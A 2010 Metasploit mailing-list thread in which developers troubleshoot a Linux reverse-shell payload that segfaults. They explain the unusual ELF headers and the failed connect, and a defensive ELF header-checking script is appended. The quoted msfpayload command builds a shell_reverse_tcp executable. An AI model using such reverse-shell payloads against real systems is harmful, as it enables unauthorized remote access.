Metasploit mailing list archives
Re: Linux payloads broken
From: egypt () metasploit com
Date: Fri, 7 May 2010 12:06:53 -0600
The "corrupt" headers are an artifact of how we create ELF executables. If you want to see how that works look at data/templates/src/elf/exe/elf_template.s

When I run an elf generated with the same command you posted under strace, it clearly calls socket() and connect() before dying. When a listener is waiting to accept that connection, it works fine. The segfault you're seeing, as Ramon and Florian have pointed out, is due to a failed connect.

Hope this helped,
egypt

On Fri, May 7, 2010 at 9:00 AM, Konrads Smelkovs <konrads () smelkovs com> wrote:
> Strace shows that it segfaults before any syscalls are placed. Furthermore, it appears that exec headers are corrupt. Whether I have listener or not on the other end doesn't matter.
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle <ramon () metasploit com> wrote:
>> Did you set a listener on the selected port?
>>
>> -Ramon
>>
>> On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
>>> konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf
>>> Created by msfpayload (http://www.metasploit.com).
>>> Payload: linux/x86/shell_reverse_tcp
>>>  Length: 71
>>> Options: LHOST=127.0.0.1,LPORT=80
>>> konrads@konrads-laptop:~/msf2$ file out.elf
>>> out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, *corrupted section header size*
>>> konrads@konrads-laptop:~/msf2$ chmod +x out.elf
>>> konrads@konrads-laptop:~/msf2$ ./out.elf
>>> *Segmentation fault*
>>> konrads@konrads-laptop:~/msf2$ uname -a
>>> Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09 UTC 2010 i686 GNU/Linux
>>>
>>> Same for metsvc_reverse_tcp payload
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
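A triage sketch for the distinction drawn in the message above, added here as an example and not code from the thread or from Metasploit: it reads an ELF32 header and separates "no usable section table" (what tools that expect one, such as file(1), complain about) from "program headers invalid" (what would actually stop the kernel from mapping the file, since execve() works from program headers). The sample bytes are constructed, and their zeroed section-header fields are an assumption, not values taken from elf_template.s.

```python
import struct

# ELF32 header, little-endian, 52 bytes: e_ident followed by the 13 fixed fields.
EHDR32 = struct.Struct("<16sHHIIIIIHHHHHH")
PHDR32_SIZE = 32  # sizeof(Elf32_Phdr)
SHDR32_SIZE = 40  # sizeof(Elf32_Shdr)


def triage_elf32(data):
    """Report program-header sanity and section-table state for an ELF32 LSB file."""
    if len(data) < EHDR32.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only 32-bit little-endian ELF is handled here")
    (_, e_type, e_machine, _, e_entry, e_phoff, e_shoff, _, _,
     e_phentsize, e_phnum, e_shentsize, e_shnum, _) = EHDR32.unpack_from(data)
    # Program headers describe the segments the kernel maps at execve().
    ph_ok = (e_phnum > 0 and e_phentsize == PHDR32_SIZE
             and e_phoff + e_phnum * e_phentsize <= len(data))
    # Section headers serve linkers, debuggers and inspection tools only.
    if e_shoff == 0 and e_shnum == 0:
        sections = "absent"
    elif e_shentsize != SHDR32_SIZE:
        sections = "bad entry size"
    else:
        sections = "present"
    return {"type": e_type, "machine": e_machine, "entry": e_entry,
            "program_headers_ok": ph_ok, "sections": sections}


def build_sample():
    """Constructed sample: ELF32 header plus one PT_LOAD entry, no sections, no code."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = EHDR32.pack(ident, 2, 3, 1, 0x08048054, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", 1, 0, 0x08048000, 0x08048000, 84, 84, 7, 0x1000)
    return ehdr + phdr


if __name__ == "__main__":
    print(triage_elf32(build_sample()))
```

A result of `program_headers_ok: True` with `sections: "absent"` means a header complaint from an inspection tool does not by itself explain a crash, so the next step is tracing the process at run time, as the reply above does with strace.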
Current thread:
- Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Florian Roth (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken egypt (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 08)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)